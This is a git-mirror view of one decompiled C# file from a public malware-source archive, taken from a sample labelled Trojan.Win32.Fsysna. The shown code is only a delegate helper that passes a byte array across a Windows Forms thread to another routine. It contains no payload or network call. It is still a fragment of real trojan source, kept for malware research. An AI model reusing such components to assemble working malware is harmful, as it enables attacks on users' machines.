mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-30 22:15:07 +00:00
f2ac1ece55
add
32 lines
976 B
C#
32 lines
976 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: n.Delegates.T.T
|
|
// Assembly: n, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: BFCF94BC-F711-4A63-941E-52FC7F306AC7
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Windows.Forms;
|
|
|
|
namespace n.Delegates.T
|
|
{
|
|
[StandardModule]
|
|
public sealed class T
|
|
{
|
|
public static void appendText(ref Form Frm, ref byte[] D)
|
|
{
|
|
if (Frm == null || Frm.IsDisposed)
|
|
return;
|
|
if (Frm.InvokeRequired)
|
|
{
|
|
n.Delegates.T.T.DELappendText method = new n.Delegates.T.T.DELappendText(n.Delegates.T.T.appendText);
|
|
Frm.Invoke((Delegate) method, (object) Frm, (object) D);
|
|
}
|
|
else
|
|
IND.ind(D);
|
|
}
|
|
|
|
private delegate void DELappendText(ref Form Frm, ref byte[] D);
|
|
}
|
|
}
|